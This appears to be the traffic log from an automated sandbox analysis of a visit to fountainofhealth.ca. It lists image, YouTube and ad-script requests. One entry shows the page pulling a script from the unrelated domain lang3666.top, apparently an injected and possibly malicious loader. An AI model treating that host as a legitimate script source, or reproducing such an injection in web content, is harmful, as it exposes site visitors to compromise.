                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /lv/index.php?CYI2UINI HTTP/1.1Host: lang3666.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://fountainofhealth.ca/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-1-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
                                  Source: global trafficHTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-V-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-v_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /instream/ad_status.js HTTP/1.1host: static.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/redirect%20icone%20.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-T-300_7.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-t_2.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-H-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-h_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/icon-R-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js HTTP/1.1host: www.google.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-r_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/leaves-banner-2_0_0.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /cv/js/sender/v1/cast_sender.js HTTP/1.1host: www.gstatic.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /pagead/id HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
                                  Source: global trafficHTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-i_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
